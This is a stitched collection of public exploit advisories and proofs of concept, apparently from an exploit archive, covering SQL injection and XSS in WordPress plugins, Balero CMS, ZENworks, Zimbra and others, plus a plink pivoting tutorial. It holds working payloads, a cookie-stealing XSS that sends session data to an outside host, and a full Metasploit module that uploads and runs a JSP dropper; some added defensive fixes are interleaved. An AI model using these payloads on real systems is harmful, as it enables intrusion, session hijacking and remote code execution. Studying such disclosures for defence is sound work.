
######################

# Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/

# Software Link : https://mega.co.nz/#!DJAEBLBS!IBiukGo-pirelHmsRV80xZDHIvpqZKtTIqsD8YrMf7U

# Date : 2015-04-05

# Tested on : Linux / Mozilla Firefox
 
######################

# Description

 WordPress All In One WP Security & Firewall 3.9.0 suffers from a Blind SQL Injection vulnerability.
 
 There are some pages that use the WordPress esc_sql function.
 esc_sql is prone to Blind SQL Injection (discovered by Ryan Dewhurst - http://dewhurstsecurity.com/)
 
 isset($_GET["orderby"]) ? $orderby = strip_tags($_GET["orderby"]): $orderby = '';
 isset($_GET["order"]) ? $order = strip_tags($_GET["order"]): $order = '';
 
 - admin/wp-security-list-404.php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'id';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 ...
 ...
 $data = $wpdb->get_results("SELECT * FROM $events_table_name ORDER BY $orderby $order", ARRAY_A);
 
 
 - admin/wp-security-list-login-fails.php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 
 $data = $wpdb->get_results("SELECT * FROM $failed_logins_table_name ORDER BY $orderby $order", ARRAY_A);
 
 
 - admin/wp-security-list-acct-activity.php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 
 $data = $wpdb->get_results("SELECT * FROM $login_activity_table ORDER BY $orderby $order LIMIT 50", ARRAY_A);
 
 
 - admin/wp-security-list-locked-ip.php
 
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 
 $data = $wpdb->get_results("SELECT * FROM $lockdown_table_name WHERE release_date > now() ORDER BY $orderby $order", ARRAY_A);
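Why esc_sql() does not help in the ORDER BY position shown above, and the allow-list that does, as an added example (not the plugin's code; the function name, column list and sample requests are assumptions for illustration):

```php
<?php
// Added example, not code from the All In One WP Security plugin. The column list,
// function name and sample requests are assumptions for illustration.

function build_order_by_clause(array $get, array $allowed_columns, string $default_column): string
{
    // Same raw inputs the listing pages read; strip_tags() was their only filtering.
    $orderby = isset($get['orderby']) ? strip_tags((string) $get['orderby']) : '';
    $order   = isset($get['order'])   ? strip_tags((string) $get['order'])   : '';

    // A column name is an identifier, not a string literal: it is never wrapped in
    // quotes, so escaping quotes (which is all esc_sql() does) changes nothing and
    // the value lands in the query verbatim. The sound control for a client-chosen
    // identifier is an allow-list of known column names with a fixed fallback.
    if (!in_array($orderby, $allowed_columns, true)) {
        $orderby = $default_column;
    }

    // Sort direction: accept exactly the two keywords, nothing else.
    $order = strtoupper($order);
    if ($order !== 'ASC' && $order !== 'DESC') {
        $order = 'DESC';
    }

    return "ORDER BY `{$orderby}` {$order}";
}

// Assumed columns of the account-activity table read by wp-security-list-acct-activity.php.
$allowed = ['id', 'user_id', 'user_login', 'login_date', 'logout_date', 'login_ip'];

// Benign request: a known column, used as requested.
$benign = ['orderby' => 'user_id', 'order' => 'asc'];
echo build_order_by_clause($benign, $allowed, 'login_date'), PHP_EOL;

// The time-based payload from the PoC below: esc_sql() would pass it through
// unchanged; the allow-list rejects it and the query sorts by the default column.
$hostile = ['orderby' => 'user_id,(select * from (select(sleep(30)))a)', 'order' => 'asc'];
echo build_order_by_clause($hostile, $allowed, 'login_date'), PHP_EOL;
```

The second call never reaches the database with the subquery: the whole orderby value is discarded and only the fixed default column name is interpolated.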

######################

# PoC

 http://VICTIM//wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id,(select * from (select(sleep(30)))a)&order=asc


######################

# Vulnerability Disclosure Timeline:

2015-04-05: Discovered vulnerability
2015-04-06: Vendor Notification
2015-04-06: Vendor Response/Feedback 
2015-04-07: Vendor Send Fix/Patch (3.9.1)
2015-04-07: Public Disclosure 

#######################

Discovered By : Claudio Viviani
                http://www.homelab.it
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
            
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps

1. Description

ShareaholicAdmin::add_location is accessible for every registered user.

File: shareaholic\shareaholic.php

add_action('wp_ajax_shareaholic_add_location',  array('ShareaholicAdmin', 'add_location'));


$_POST['location'] is not escaped.

File: shareaholic\admin.php

public static function add_location() {
	$location = $_POST['location'];
	$app_name = $location['app_name'];
	ShareaholicUtilities::update_options(array(
	  'location_name_ids' => array(
	    $app_name => array(
	      $location['name'] => $location['id']
	    ),
	  ),
	  $app_name => array(
	    $location['name'] => 'on'
	  )
	));

	echo json_encode(array(
	  'status' => "successfully created a new {$location['app_name']} location",
	  'id' => $location['id']
	));

	die();
}

http://security.szurek.pl/shareaholic-7603-xss.html

2. Proof of Concept

Log in as a regular user (created using wp-login.php?action=register), then:

<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="shareaholic_add_location">
    <input type="hidden" name="location[app_name]" value="recommendations">
    <input type="hidden" name="location[name]" value="post_below_content">
    XSS: <input type="text" name="location[id]" value="'><script>alert(String.fromCharCode(88,83,83));</script>">
    <input type="submit" value="Hack!">
</form>

XSS will be visible for admin:

http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings
  
3. Solution:
  
Update to version 7.6.1.0
https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip
https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/
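A hardened version of the handler, added here as an example and not Shareaholic's code; $options, render_location_ids() and the token pattern are stand-ins and assumptions for illustration (in WordPress the authorisation check would be current_user_can('manage_options') plus check_ajax_referer(), and the escaping esc_attr() at output time):

```php
<?php
// Added example, not Shareaholic's code. $options and render_location_ids() are
// stand-ins for the plugin's persisted options and its settings page.

$options = [];

function add_location(array $post, bool $user_can_manage_options, array &$options): array
{
    // 1. Authorisation. The wp_ajax_* hook fires for any logged-in user, so the
    //    handler itself has to refuse callers without the administrative capability.
    if (!$user_can_manage_options) {
        return ['status' => 'forbidden', 'id' => null];
    }

    $location = (isset($post['location']) && is_array($post['location'])) ? $post['location'] : [];

    // 2. Input validation. Each field is a short identifier-like token, so accept
    //    only that (the character set and length are assumptions for this example).
    foreach (['app_name', 'name', 'id'] as $field) {
        if (!isset($location[$field]) || !is_string($location[$field])
            || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $location[$field])) {
            return ['status' => "invalid {$field}", 'id' => null];
        }
    }

    // Same structure the original handler writes through ShareaholicUtilities::update_options().
    $options['location_name_ids'][$location['app_name']][$location['name']] = $location['id'];
    $options[$location['app_name']][$location['name']] = 'on';

    return [
        'status' => "successfully created a new {$location['app_name']} location",
        'id'     => $location['id'],
    ];
}

// 3. Output escaping. Whatever was stored is rendered as text, never as markup,
//    so a value like the PoC payload cannot break out of the attribute.
function render_location_ids(array $options): string
{
    $html = '';
    foreach ($options['location_name_ids'] ?? [] as $app => $names) {
        foreach ($names as $name => $id) {
            $field = $app . '[' . $name . ']';
            $html .= '<input type="text" name="' . htmlspecialchars($field, ENT_QUOTES, 'UTF-8')
                   . '" value="' . htmlspecialchars((string) $id, ENT_QUOTES, 'UTF-8') . '">' . "\n";
        }
    }
    return $html;
}

// Constructed request reproducing the PoC form above.
$post = ['location' => [
    'app_name' => 'recommendations',
    'name'     => 'post_below_content',
    'id'       => "'><script>alert(String.fromCharCode(88,83,83));</script>",
]];

var_dump(add_location($post, false, $options));   // caller without manage_options
var_dump(add_location($post, true, $options));    // administrator, but the id fails validation

// Defence in depth: even if the raw value had reached the options, the renderer neutralises it.
$options['location_name_ids']['recommendations']['post_below_content'] = $post['location']['id'];
echo render_location_ids($options);
```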
            
<!--

Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
is not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5239
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php


04.03.2015

-->


<html>
  <body>
    <script>
      document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
    </script>
  </body>
</html>


csrf+stored xss+filter bypass+session hijack:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
      <input type="hidden" name="title" value="ZSL" />
      <input type="hidden" name="content" value="pwned&lt;/textarea&gt;<s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
      <input type="hidden" name="files" value="joxy.poxy" />
      <input type="hidden" name="delete_post[]" value="135" />
      <input type="hidden" name="id" value="135" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
            

Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: The application suffers from multiple blind SQL injection vulnerabilities
when input is passed to several POST parameters thru their affected modules
which are not properly sanitised before being returned to the user or used
in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Vulnerable POST parameters in affected modules:
-----------------------------------------------
- pages         [admin]
- themes        [admin]
- code          [mod-languages]
- id            [mod-blog, mod-virtual_page]
- title         [mod-blog]
- a             [mod-virtual_page]
- virtual_title [mod-virtual_page]
-----------------------------------------------

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5238
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5238.php


04.03.2015

--


csrf+bsqli poc:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_page/mod-virtual_page/id-11" method="POST">
      <input type="hidden" name="virtual_title" value="ZSL" />
      <input type="hidden" name="a" value="1" />
      <input type="hidden" name="content" value="Testingus" />
      <input type="hidden" name="_wysihtml5_mode" value="1" />
      <input type="hidden" name="id" value="11' and benchmark (50000000,sha1(1))-- " />
      <input type="hidden" name="submit_delete" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
            
# Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection
# Google Dork: inurl:/plugins/trafficanalyzer/js/
# Date: 4/7/2015
# Exploit Author: Dan King (@fuzztester)
# Vendor Homepage: http://wptrafficanalyzer.in/
# Software Link: https://wordpress.org/plugins/trafficanalyzer/
# Version: 3.4.2
# Tested on: Ubuntu 14.10 with Mysql and Wordpress 4.11

[+] Issue [+]

The WordPress plugin "Traffic Analyzer" is vulnerable to a blind SQL injection. The application does not properly validate input from the "Referer" HTTP header value.

[+] Impact [+]

This vulnerability would allow a remote attacker to access the database with the privileges configured by WordPress. This could also lead to the attacker gaining remote access to the web server's filesystem and further compromising the system hosting the WordPress installation.

[+] Details [+]

The following section of PHP code is where the vulnerability exists. The $sql variable is a concatenated string intended to be used to insert data into the database. The variable $referer is not checked for malicious data.

From 'class-TrafficAnalyzer.php' line number 297:

######################################################################################
$sql = " insert into $wpdb->prefix"."tanalyzer_pre ( hid,ip, script_name, user_agent, request_uri,resource_type,browser,resource,http_referer,wpta_cookie ) values ".
                                        " ('".$hid."'," .
                                        " '".$_SERVER["REMOTE_ADDR"]."', ".
                                        "'".$_SERVER['SCRIPT_NAME']."', " .
                                        " '".$_SERVER["HTTP_USER_AGENT"]."', ".
                                        " '". $_SERVER['REQUEST_URI']. "', ".
                                        " '".$resource_type."', " .
                                        " '".$browser."', " .
                                        " '".$resource ."', " .
                                        " '".$referer . "', " .
                                        " '".$this->wpta_cookie . "'" .
                                        " )";
###########################################################################################
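The same INSERT rebuilt as a prepared statement, added here as an example rather than taken from the plugin; PDO with an in-memory SQLite database (the pdo_sqlite extension) stands in for $wpdb so that it runs on its own, and the column types and sample request values are constructed:

```php
<?php
// Added example, not code from the Traffic Analyzer plugin. The Referer header and
// every other request-derived field travel as bound values, not as SQL text.

function record_visit(PDO $db, string $prefix, array $row): int
{
    // The table prefix comes from the site configuration, never from the request, so
    // interpolating it is acceptable; every request-derived value is a placeholder.
    $sql = "INSERT INTO {$prefix}tanalyzer_pre"
         . " (hid, ip, script_name, user_agent, request_uri, resource_type, browser, resource, http_referer, wpta_cookie)"
         . " VALUES (:hid, :ip, :script_name, :user_agent, :request_uri, :resource_type, :browser, :resource, :http_referer, :wpta_cookie)";

    $stmt = $db->prepare($sql);
    $stmt->execute([
        ':hid'           => $row['hid'],
        ':ip'            => $row['ip'],
        ':script_name'   => $row['script_name'],
        ':user_agent'    => $row['user_agent'],
        ':request_uri'   => $row['request_uri'],
        ':resource_type' => $row['resource_type'],
        ':browser'       => $row['browser'],
        ':resource'      => $row['resource'],
        ':http_referer'  => $row['http_referer'],
        ':wpta_cookie'   => $row['wpta_cookie'],
    ]);
    return (int) $db->lastInsertId();
}

// In-memory database with the columns the plugin's INSERT names (types are assumed).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE wp_tanalyzer_pre (
    id INTEGER PRIMARY KEY AUTOINCREMENT, hid TEXT, ip TEXT, script_name TEXT, user_agent TEXT,
    request_uri TEXT, resource_type TEXT, browser TEXT, resource TEXT, http_referer TEXT, wpta_cookie TEXT)');

// Constructed request: the Referer carries the exact payload from the PoC below.
$row = [
    'hid'           => 'h1',
    'ip'            => '198.51.100.7',
    'script_name'   => '/index.php',
    'user_agent'    => 'Mozilla/5.0',
    'request_uri'   => '/',
    'resource_type' => 'page',
    'browser'       => 'Firefox',
    'resource'      => 'home',
    'http_referer'  => "BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'",
    'wpta_cookie'   => 'c1',
];
$id = record_visit($db, 'wp_', $row);

// The header was stored as an opaque string; nothing in it was evaluated as SQL.
$check = $db->prepare('SELECT http_referer FROM wp_tanalyzer_pre WHERE id = :id');
$check->execute([':id' => $id]);
$stored = $check->fetchColumn();
echo ($stored === $row['http_referer']) ? "referer stored verbatim, not executed\n" : "mismatch\n";
```

Inside WordPress the same shape is $wpdb->prepare() with %s placeholders, or $wpdb->insert() with a format array, instead of string concatenation.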


[+] Proof of Concept [+]

Sending the following HTTP request to a vulnerable site will cause the request to be delayed for 30 seconds.

GET /[wordpress path]/ HTTP/1.1
Host: x.x.x.x
Referer: BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'
            

Plink.exe is the command-line version of the PuTTY SSH client. Recent Windows versions already ship a built-in SSH client, so plink is not very useful there; it is useful, however, on older systems that lack that SSH client.

The plink binary can usually be found at:

/usr/share/windows-resources/binaries/plink.exe

Otherwise, it can be downloaded from the official PuTTY website.

Since plink.exe is an SSH client, the only thing we can do with it is Remote Port Forwarding. The SSH post already discussed the danger of this: essentially you are typing the credentials of your own machine into a machine that is not yours, so care is needed (asymmetric keys can also be used).

The command to use plink.exe is the following:

cmd.exe /c echo y | plink.exe -l <user> -pw <password> <my attacker IP> -R <port to open on my attacking machine>:<host we want to tunnel to>:<port we want to tunnel>

We would transfer plink to the Windows machine and run the command from there.

The first part of the command, cmd.exe /c echo y, is there so that in non-interactive shells (as most reverse shells on Windows systems are) we can accept the warning prompt that plink shows by default.

Otherwise, the rest of the command is easy to follow if you have already worked with Remote Port Forwarding; if not, I recommend reading the Pivoting with SSH post.

In addition, some useful parameters we can add to plink are the following:

  • -g -> allows other clients on the LAN to connect to the port opened on the attacking machine. By default it is only reachable locally.
  • -f -> plink goes to the background once the SSH session has been established successfully.
  • -N -> tells plink not to run a shell, just to connect (this does not mean the process is sent to the background).

It is quite advisable to use the -f and -N parameters.

-i -> lets you specify a private key. However, a conversion is needed, because plink does not understand the default format produced by ssh-keygen. Once the private key has been generated with ssh-keygen, follow these steps:

Install the PuTTY tools:

sudo apt install putty-tools

Once installed, use puttygen:

puttygen <private key> -o <new private key>.ppk

This way, plink will understand the new private key and we can use it.

With all that explained, let's run a test in the following lab:

  • 3 machines
    • Kali
      • IP: 192.168.10.10
    • Windows 7
      • IP: 192.168.10.40 and 192.168.20.40 -> 2 network interfaces
    • Debian -> Web and SSH server, ports 22 and 80 enabled
      • IP: 192.168.20.20

NOTE: for the Remote Port Forwarding, I recommend making a simple password change in passwd.

For those who are not familiar with this: you can basically generate a DES UNIX password with openssl.

If we take the generated password and substitute it for the «x» in passwd, the user's password will be the one we set in openssl, in this case «hola»; when we want to go back to the previous password we simply remove what we wrote in passwd and put the «x» back.

With that done, we go to the Windows machine and use plink as indicated in the command written earlier:

cmd.exe /c echo y | plink.exe -l <user> -pw <password> <my attacker IP> -R <port to open on my attacking machine>:<host we want to tunnel to>:<port we want to tunnel>

If we look closely, there are two important points here:

  1. We can tunnel as many ports as we want, always using the -R parameter.
  2. When tunnelling an SSH port, we must specify another port to use/open on our machine other than 22, since that one is already in use.

This way, we now have both ports tunnelled, in this case 22 (2222 on our machine) and 80.

Plink is a tool that will gradually fall into disuse because of the default SSH client implementation on Windows systems. However, on certain occasions when dealing with some old system, it can come in quite handy.

>> Remote code execution in Novell ZENworks Configuration Management 11.3.1
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 07/04/2015 / Last updated: 07/04/2015

>> Background on the affected product:
"Automate and accelerate your Windows 7 migration
Microsoft estimates that it can take more than 20 hours to migrate a
single machine to Windows 7. Novell ZENworks Configuration Management
is ready to dramatically accelerate and automate every aspect of your
Windows 7 migration efforts.

Boost user productivity
Use Novell ZENworks Configuration Management to make sure users always
have access to the resources they need regardless of where they work
or what devices they use.

Eliminate IT effort
Automatically enforce policies and dynamically manage resources with
identity-based management of users as well as devices.

Expand your freedom to choose
Manage the lifecycles of all your current and future assets, with full
support for Windows and Linux systems, Novell eDirectory, Active
Directory, and more.

Simplify deployment with virtual appliances
Slash deployment times with a convenient virtual appliance deployment option.

Enjoy a truly unified solution
Centralize the management of all your devices into a single, unified
and easy-to-use web-based ZENworks console—called ZENworks Control
Center."

This vulnerability is present in ZENworks Configuration Management
(ZCM) which is part of the ZENworks Suite.
A blast from the past? This is a similar vulnerability to ZDI-10-078 /
OSVDB-63412, but it abuses a different parameter of the same servlet.
However this time Novell:
- Did not bother issuing a security advisory to their customers.
- Did not credit me even though I did responsible disclosure.
- Refused to provide a CVE number for months.
- Did not update their ZENworks Suite Trial software with the fix (you
can download it now from their site, install and test the PoC /
Metasploit module).
- Does not list the fix in the ZCM 11.3.2 update information
(https://www.novell.com/support/kb/doc.php?id=7015776).


>> Technical details:
Vulnerability: Remote code execution via file upload and directory traversal
CVE-2015-0779
Constraints: none; no authentication or any other information needed
Affected versions: ZENworks Configuration Management 11.3.1 and below

POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war
<WAR file payload in the body>

The WAR file will be automatically deployed to the server (on certain
Windows and Linux installations the path can be "../webapps/"). A
Metasploit module that exploits this vulnerability has been released.


>> Fix:
Upgrade to version ZENworks Configuration Management 11.3.2.


[1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt
[2]: https://github.com/rapid7/metasploit-framework/pull/5096
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
      'Description'    => %q{
        This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager
        6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface
        due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set
        the 'username' attribute before authentication. The second problem is that the settings-new.jsp
        file will only check the 'username' attribute before authorizing the 'uploadFile' action,
        which can be exploited and allows the attacker to upload a fake xls host list file to the
        server, and results in arbitrary code execution under the context of SYSTEM.

        Depending on the installation, by default the Change Advisor web server is listening on port
        48080 for an express install. Otherwise, this service may appear on port 8080.

        Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip. You may
        download it from the module's References section.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod',  # Original discovery
          'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_
          'sinn3r' # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2015-2284'],
          ['OSVDB', '81634'],
          ['ZDI', '15-107'],
          ['URL', 'http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip']
        ],
      'DefaultOptions'  =>
        {
          'RPORT'    => 48080 # Could be 8080 too
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Solarwinds Firewall Security Manager 6.6.5', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 13 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/'])
      ], self.class)
  end


  # Returns a checkcode that indicates whether the target is FSM or not
  def check
    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'fsm', 'login.jsp'))

    if res && res.body =~ /SolarWinds FSM Change Advisor/i
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end


  # Exploit/run command
  def exploit
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager')
    end

    # Stage 1 of the attack
    # 'admin' is there by default and you can't delete it
    username = 'admin'
    print_status("Auth bypass: Putting session value: username=#{username}")
    sid = put_session_value(username)
    print_status("Your SID is: #{sid}")

    # Stage 2 of the attack
    exe = generate_payload_exe(code: payload.encoded)
    filename = "#{Rex::Text.rand_text_alpha(5)}.jsp"
    # Because when we get a shell, we will be at:
    # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
    # So we have to adjust this filename in order to delete the file
    register_files_for_cleanup("../plugins/com.lisletech.athena.http.servlets_1.2/jsp/#{filename}")
    malicious_file = get_jsp_payload(exe, filename)
    print_status("Uploading file: #{filename} (#{exe.length} bytes)")
    upload_exec(sid, filename, malicious_file)
  end


  private


  # Returns a write-stager
  # I grabbed this from Juan's sonicwall_gms_uploaded.rb module
  def jsp_drop_bin(bin_data, output_file)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|

    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|

    jspraw << %Q|int numbytes = data.length();\n|

    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
    jspraw << %Q|{\n|
    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
    jspraw << %Q|  comb <<= 4;\n|
    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
    jspraw << %Q|}\n|

    jspraw << %Q|outputstream.write(bytes);\n|
    jspraw << %Q|outputstream.close();\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  # Returns JSP that executes stuff
  # This is also from Juan's sonicwall_gms_uploaded.rb module
  def jsp_execute_command(command)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|try {\n|
    jspraw << %Q|  Runtime.getRuntime().exec("chmod +x #{command}");\n|
    jspraw << %Q|} catch (IOException ioe) { }\n|
    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
    jspraw << %Q|%>\n|

    jspraw
  end


  # Returns a JSP payload
  def get_jsp_payload(exe, output_file)
    jsp_drop_bin(exe, output_file) + jsp_execute_command(output_file)
  end


  # Creates an arbitrary username by abusing the server's unsafe use of session.putValue
  def put_session_value(value)
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
      'method'   => 'GET',
      'vars_get' => { 'username' => value }
    )

    unless res
      fail_with(Failure::Unknown, 'The connection timed out while setting the session value.')
    end

    get_sid(res)
  end


  # Returns the session ID
  def get_sid(res)
    cookies = res.get_cookies
    sid = cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
    sid
  end


  # Uploads a malicious file and then execute it
  def upload_exec(sid, filename, malicious_file)
    res = upload_file(sid, filename, malicious_file)

    if !res
      fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.')
    elsif res.body.include?('java.lang.NoClassDefFoundError')
      print_status('Payload being treated as XLS, indicates a successful upload.')
    else
      print_status('Unsure of a successful upload.')
    end

    print_status('Attempting to execute the payload.')
    exec_file(sid, filename)
  end


  # Uploads a malicious file
  # By default, the file will be saved at the following location:
  # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
  def upload_file(sid, filename, malicious_file)
    # Put our payload in:
    # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\jsp\
    filename = "../../jsp/#{filename}"

    mime_data = Rex::MIME::Message.new
    mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#{filename}\"")
    mime_data.add_part('uploadFile', nil, nil, 'name="action"')

    proto = ssl ? 'https' : 'http'
    ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}"

    send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp'),
      'method'   => 'POST',
      'vars_get' => { 'action' => 'uploadFile' },
      'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",
      'data'     => mime_data.to_s,
      'cookie'   => sid,
      'headers'  => { 'Referer' => ref }
    )
  end


  # Executes the malicious file and get code execution
  # We will be at this location:
  # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
  def exec_file(sid, filename)
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'fsm', filename)
    )
  end


  # Overrides the original print_status so we make sure we print the rhost and port
  def print_status(msg)
    super("#{rhost}:#{rport} - #{msg}")
  end

end
            
source: https://www.securityfocus.com/bid/51952/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.

PHP 5.3.8 is vulnerable; other versions may also be affected. 

<?php

// Create a PDO MySQL statement first (connection details are placeholders)
$pdo  = new PDO('mysql:host=localhost;dbname=test', 'user', 'password');
$stmt = $pdo->query('SELECT 1');

// Fetch a row as a lazily populated PDORow object
$result = $stmt->fetch(PDO::FETCH_LAZY);

session_start();

// Storing the PDORow object in the session forces it to be serialized at shutdown,
// which is what triggers the crash on the affected PHP version
$_SESSION['PDORow'] = $result;
?>
            
source: https://www.securityfocus.com/bid/51979/info
   
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
   
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
   
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include_once    File: base_graph_form.php            Line: 1
Exploit: http://www.example.com/base/base_graph_form.php?BASE_path=[EV!L]
            
source: https://www.securityfocus.com/bid/51974/info

Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/zimbra/h/calendar?view=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
            
source: https://www.securityfocus.com/bid/51976/info
 
Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
 
Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
 
